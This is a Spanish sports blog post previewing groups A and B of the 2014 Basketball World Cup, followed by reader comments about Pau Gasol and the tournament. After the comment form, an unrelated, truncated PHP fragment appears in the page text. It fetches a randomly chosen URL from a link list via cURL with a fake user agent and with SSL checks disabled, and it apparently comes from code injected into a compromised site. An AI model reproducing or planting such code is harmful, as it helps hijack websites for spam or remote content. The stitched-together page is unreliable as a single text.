Mundobasket 2014: Previa grupos A y B

27 de August de 2014 por TheDeerHunter

Aperitivo a la vista. Aún estamos lejos de comenzar la nueva temporada de la NBA pero estos días vamos a poder disfrutar de algunos de sus mejores jugadores en el campeonato del mundo que se celebra en España. Hacemos un repaso centrándonos en los representantes de la liga que van a ser de la partida.

Grupo A:

marc ibaka

España: Es uno de los grandes favoritos. No sólo por jugar en casa, por su alta motivación tras las ausencias en el pasado Eurobasket, o por sus 6 jugadores NBA en activo (más 3 exNBA y algún que otro futurible). Poseen quizá el juego interior más potente del torneo y un candidato claro al MVP desde el primer día como es Marc Gasol. Habrá que seguir muy de cerca al Pau Gasol más descansado desde que llegó a la mejor liga del mundo y a un Serge Ibaka que probablemente volverá a causar estragos en las zonas FIBA. Ricky Rubio querrá brillar para apretar aún más a los Wolves con su futuro contrato, Jose Calderón es una garantía y habrá que ver si Victor Claver repite su digno europeo anterior o vuelve al modo “missing in action” más habitual en él. Existen ciertas dudas alrededor del perímetro y también sobre el técnico Juan Antonio Orenga, que aún no ha demostrado estar a la altura del grupo que dirige.

diaw lebronFrancia: Vigentes y flamantes campeones de Europa, pero con un gran número de bajas decisivas que limitarán sus aspiraciones. Pasarán sin problemas la fase de grupos pero no avanzarán mucho más. Ni Parker ni Noah estarán presentes, como tampoco Ajinça. Cuentan, como principales bazas, con el campeonísimo Boris Diaw y con un Nicolas Batum con total libertad de acción. Hay que añadir a Evan Fournier, Rudy Gobert e Ian Mahinmi.

Serbia: Aunque llegan sin grandes nombres NBA se trata de un bloque que nunca se debe subestimar. Pasarán sin grandes problemas la liguilla y serán un duro cruce, aunque difícilmente aspiran a ganar el torneo. Con total seguridad veremos a Miroslav Raduljica con más protagonismo que en su club. También podremos observar las evoluciones del joven Bogdan Bogdanovic, pick de Suns que jugará de momento en el Fenerbahce Ulker, aunque no disfrutaremos de la presencia de Nemanja Nedovic después de que el jugador de los Warriors no se haya recuperado de su lesión en el pie derecho.

Brasil: Los cuartos en discordia. Cuentan con un juego interior tremendo, compuesto por Tiago Splitter, Nene Hilario y Anderson Varejao y que ya por sí solo les garantiza alcanzar los cruces, pero veremos si da para mucho más. Nos quedaremos con las ganas de conocer a Bruno Caboclo, la gran y muy sorprendente apuesta de Masai Ujiri para los Raptors.

Irán: Perita en dulce pese al gigante ex Grizzlies Hamen Haddadi. Si tienen suerte ganarán a Egipto.

Egipto: Bastante han hecho con llegar aquí.

Grupo B:

giannis antetokounmpoGrecia: En un grupo tan igualado y de relativo bajo nivel, no debería sorprender que se impusiera el oficio y la competitividad helena. Cuentan con tres NBA. Nick Calathes, descansadito en medio de su sanción de 20 partidos por consumo de sustancias prohibidas. También el nuevo fichaje de los Rockets y ex del Barça, Kostas Papanikolau, además de uno de los favoritos del blog, Giannis Antetokounmpo, llamado a ser una de las revelaciones.

Croacia: Interesante selección con una buena mezcla de juventud y talento. Un grupo que lleva jugando cierto tiempo juntos y cada vez lo hacen mejor aunque aún adolece de cierta pegada a la hora de la verdad para considerarlos como candidatos. Sus NBA son Bojan Bogdanovic, que apenas ha contado en los Nets, y el nuevo Pacer Damjan Rudez, aunque también hay muchas ganas de ver las evoluciones de la perla del pasado draft Dario Saric.

luis scola pacersArgentina: Por desgracia no veremos la mejor versión de la albiceleste, aunque siempre esperamos de ellos cuanto menos pelea. El reflejo del nivel de esta selección la dan sus dos únicos representantes NBA, los últimos de una generación gloriosa. Luis Scola y Pablo Prigioni defenderán la camiseta con dignidad pero su equipo no puede competir contra los verdaderos aspirantes. Pasarán esta primera fase y después serán un hueso en cualquier cruce. Su suerte entonces dependerá del rival que le toque en suerte.

Puerto Rico: Momento de transición en la escuadra puertorriqueña, tratando de resarcirse de la pésima actuación del anterior mundial. Aún cuentan con Juan José Barea y otros viejos conocidos de la liga pero les da para ser cuartos de grupo y gracias.

Senegal: Una de las cenicientas del campeonato, pero aún cuentan con un NBA como es Gorgui Dieng. Hay ganas de observar su rol con la selección tras un gran año de rookie.

Filipinas: Tendrán suerte si ganan algún partido aunque cuenten con un jugador de la talla de Andray Blatche. El bueno de Andray es especial hasta en la selección con la que participa.

Comenta

11 comentarios a esta entrada

  1. nba dice:
    #1

    esta bien esta descripción del grupo.
    Q Siro lopez sea el conductor de la retransmision del partido de España hace q Montes se revuelva en su tumba.
    Hasta el insulso de Mel Otero hubiese sido mejor opcion q este.
    Una cosa es barrer para casa, pero hasta q no nos enfrentemos a Brasil, no veremos si de verdad la selección española ha venido a por el oro, eso si, dependerá de si los jugadores exteriores de Usa les dejan , porque tienen la pinta de q van a sodomizar a los defensores del perímetro como ha pasado ante finlandia

      Citar

  2. txusma dice:
    #2

    Ya sabemos que no se puede medir a un equipo cuando se enfrenta a otros de muy bajo nivel pero me han repateado ciertas actitudes de la selección ante Irán y Egipto. Hay que jugar siempre serios y con la idea que vas aplicar en los sucesivos partidos siempre en la cabeza. Por otro lado, hay que mejorar el acierto en el tiro exterior y preocupa el mal momento de Calderon aunque es cierto que ha jugado principalmente de escolta en estos dos primeros partidos. A ver qué tal hoy contra Brazil. Por cierto alguien a día de hoy aún cree que hay debate entre Serge Ibaka y Nikola Mirotic?

    Enorme Gorgui Dieng…

      Citar

  3. rumbero dice:
    #3

    txusma:
    Por cierto alguien a día de hoy aún cree que hay debate entre Serge Ibaka y Nikola Mirotic?

    Quitando los del Marca creo que hay poco debate ahí a día de hoy. Es un lujo como pocos tenerlo en el banquillo, sólo superado por volver a ver una de las mejores versiones de Pau y Navarro.
    Saludos a los que ya están de vuelta y a los que aún están de vacaciones, os odio con todas mis fuerzas.

      Citar

  4. Nacho dice:
    #4

    Supongo que Pau está en el punto más alto de su temporada. Es difícil que pueda jugar más motivado, juega en casa, quiere ganarle el oro a USA (y Río16 queda lejos) y está en “su” equipo, donde es líder, no solo en juego, sino en todos los aspectos que rodean a un rooster. Es querido y admirado por todos.
    Dicho esto, y tras las pachangas de los dos primeros días, anteayer se salió ante un equipo bueno, y con un juego interior NBA de los más que decentes. Espero que este nivel lo mantenga en los Bulls, y sea junto con un nosé nosé Rose punta de lanza de un equipo que podría aspirar a finales.
    Este partido contra Brasil me hace sacar varias conclusiones, o preguntas al aire:
    A LOS LAKERS: ¿Sois conscientes de dónde habéis enclaustrado a pedazo de jugador que tras un mal año (último de Zen), colocasteis con entrenadores que le menospreciaban (al menos en su juego) y que además, no aportaban nada al equipo?
    A LOS AFICIONADOS pro GASOFT: ¿En serio os habéis creído eso?
    A LOS AFICIONADOS pro GASOL: Nuestra admiración por él (por su juego, por lo que ha representado para un país que ama este deporte y que por fin ha salido de sus fronteras), ¿nos hace ver sus lagunas?
    A LOS BULLS: ¿Sois conscientes de lo que os puede aportar, y que si el nosé nosé Rose se confirma en un sí sí no deberíais renunciar a nada?
    A PAU: ¿De una puta vez asumirás el liderazgo que te corresponde, darás voces, órdenes (a quien sea) también en la NBA?

      Citar

  5. TheDeerHunter dice:
    #5

    Interesante análisis… aunque yo creo que Pau ya no puede sorprender a nadie a estas alturas.
    ¿Está rindiendo a un nivel fantástico? En efecto. Muchos creemos que ese debería de haber sido su nivel más allá de la gran media temporada que se marcó después de su último anillo. No se trata de sólo un mal año. Se trata de un bajón evidente en el plano físico, mental, nivel de confianza, autoexigencia, carácter, motivación… ¿Todo se reduce a los entrenadores que le han menospreciado? Han sido tres y a cada cual más distinto los que han ido perdiendo la confianza en él… y no sólo ellos sino a muchos que le hemos seguido habitualmente. Antes, se le ninguneaba por hacerle tirar de lejos y ahora que destroza el juego interior de Brasil lanzando mucho de lejos y parece que se ha descubierto la rueda…

    Todo hay que contextualizarlo. Pau se va a vaciar en este campeonato y el formato le permite hacerlo. Hay que ver cómo llega a Chicago y, sobre todo, cómo es capaz de afrontar las nuevas exigencias. Ójala el cambio de aires le siente bien, pero en Lakers se había convertido en un jugador a la deriva, principalmente por su propia culpa.

    Mientras tanto disfrutemos de esta gran versión suya.

      Citar

  6. Denise dice:
    #6

    Para empezar…reconozco que no he visto mucho del Mundial porque tampoco me interesa mucho dado que el torneo es infame. Un Mundial de basket no puede constar de 24 equipos porque no hay suficiente nivel y más aun cuando muchas estrellas pasan olimpicamente del torneo y al final lo que pasa es que tenemos una pimera fase aburrida y descafeinada donde se ven palizas de escandalo y abundan los partidos intranscendentes y sin interes.
    Dicho esto, creo que no hay que fliparse con Pau porque lo que ha hecho ha sido ante las “temibles” Irán y Egipto, y luego con Brasil, si tiene mas nivel y jugó bien pero no habría que llenarse la boca con lo de que Brasil tiene 3 centers NBA y demas…cuando solo Varejao da la talla. Splitter me sigue pareciendo un overrated de cojones por mucho anillo que tenga y Nene está viejo, mermado y totalmente en declive.
    Dicho lo cual, creo que para bien o para mal, el nivel que muestre Pau en el mundial no va a tener nada que ver con el que muestre en los Bulls. En el Mundial se va a encontrar de aq

      Citar

  7. Denise dice:
    #7

    Se me a cortao…continuo….
    En el Mundial se va a encontrar de aqui a lo que falta quizas uno ó dos jugadores de su nivel y luego EEUU, aqui el juego es menos fisico, menos rápido y se trata de un torneo corto donde en los partidos importantes podrá vaciarse al 100% y con bastantes partidos de relleno (como los de Iran y Egipto)
    En cambio, en la NBA cada vhoque peleas en la pintura con un tio de tu nivel, el juego es veloz, rapido, fisico, juegas mas minutos y a todo eso añadele jugar cada 2 noches con un gran puñado de desplazamientos, todo eso para un cuerpo de 34 años bastante exigido por jugar tantos años en la NBA y tantos torneos internacionales intranscendentes como son los Mundiales y los Eurobasket.

      Citar

  8. rumbero dice:
    #8

    Denise:
    Splitter me sigue pareciendo un overrated de cojones por mucho anillo que tenga y Nene está viejo, mermado y totalmente en declive. Dicho lo cual, creo que para bien o para mal, el nivel que muestre Pau en el mundial no va a tener nada que ver con el que muestre en los Bulls

    Que eres más de Rudy Gobert que de Splitter lo sabemos, pero Nene viene de hacer muy buena temporada (repaso a la pintura de los Bulls incluido) xD Dicho esto, estamos de acuerdo con que habrá que ver a Pau durante 82 partidos de regular. Yo no lo veo aguantando un nivel parecido a este porque como bien dice Deer, el formato de la competición se lo permite, pero tampoco espero ver al Pau apático y con 0 motivación de los últimos tiempos.

      Citar

  9. Nacho dice:
    #9

    Consideraciones @Denise:
    No sé qué entiendes por infame. Pero en esta primera fase hay partidos muy interesantes. Si no te gusta el basket FIBA o ver a jugadores potenciales NBA lo entiendo. Pero vamos, yo aunque barajase esos parámetros lo prefiero a la Summer Ligue
    De los partidos intrascendentes se puede pasar. El que jueguen selecciones con poco nivel tiene dos lecturas. La tuya, muy respetable, y la de los organizadores y equipos malos, que entienden que enfrentándose a los mejores pueden mejorar. Incluso una tercera, y que se lo pregunten a Bilbao, si que juegue allí Finlandia mola o no.
    Sobre el flipe de Pau. Nadie ha hablado aquí de su juego ante las terribles Irán y Egipto. A nadie se le ha llenado la boca con lo de los centers NBA de Brasil. Solo se ha constatado un hecho. Te gusten o no. Lo son, y titulares. Y creo que uno es campeón (que a mí tampoco me termina de convencer, pero lo es) y del otro, que no he visto este año, algo ha dicho Rumbero.

    Tu segunda parte (lanzados ya los exabruptos) ya es interesante. Tú consideras que no estará al nivel (o deduzco yo que lo consideras) y das unas razones muy válidas. Espero que yerres, porque deseo ver a este Pau también en la temporada.
    Razones: Thibo me parece un entrenador que sabe sacar mucho de sus jugadores y que la estrellitis se la pasa por el forro, si sabe dar en la tecla con el catalán, mucho ganado. Al igual que en este mundial, la motivación para Pau será determinante. Se va a la franquicia por excelencia para una generación de españolitos a los que nos gusta el basket. Si algunos empezamos a vibrar con el showtime de LA y los Celtics de Bird, la gran mayoría de vosotros, amantes de esto (Pau incluido), lo más era Jordan, y los míticos Bulls. Esa supongo que es la principal razón por la que se ha ido allí. Además estrena conferencia. Mucho más suave en todos los aspectos. Prácticamente mismos horarios siempre, desplazamientos más cortos, menor nivel de juego en general, y de pintura en particular, equipo donde no solo está Thibhodeau, si no también unos jugadores más de su estilo. Solo tendrá 10 o 12 desplazamientos lejanos, que se ventilarán en tres mini giras.
    Por estas razones y porque espero que conteste sí a mi pregunta directa, espero ver un grandísimo Pau este año.

      Citar

  10. Denise dice:
    #10

    Yo no he cuestionado la calidad de Gasol porque a estas alturas sería de idiota, solo digo que no hay que creer que porque esté haciendo un gran Mundial ya por eso se vaya a salir en los Bulls, porque no es lo mismo una competición de 2 semanas en la que te enfrentas como mucho a 2-3 pivots de tu nivel, que otra de 100 partidos y viajes si quieres el anillo enfrentandote cada 2 dias a pivots de entidad.
    Sobre el Mundial, claro que me gustaría si fuese un torneo donde los jugadores se lo toman en serio, pero estos torneos a diferencia que en otros deportes donde los jugadores se matan por ir al Mundial, aqui no interesan lo mas minimo a los propios interesados. Y da coraje ver a un montón de selecciones sin sus mejores jugadores lo que hace que se puedan sacar pocas conclusiones de que pais es el mejor y esto devalua y desprestigia mucho el torneo.

      Citar

  11. TheDeerHunter dice:
    #11

    Cuando llegue a Chicago Pau no puede ignorar lo que ha pasado con Boozer. Al final a Thibodeau no le tembló el pulso dejándole por detrás de Gibson en la rotación. Es la prueba clara de que a no todos los jugadores les viene bien los métodos del técnico.
    Deberá alcanzar un nivel defensivo que no le hemos visto desde hace varios años y aún así no resulta nada descabellado pensar que puede terminar siendo el tercer interior del equipo por detrás de Noah y Gibson. Pau ha demostrado que la idea de partir de 6º hombre no la digiere nada bien y debería mentalizarse a una posibilidad que está ahí si quiere hacer una buena campaña en Chicago.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>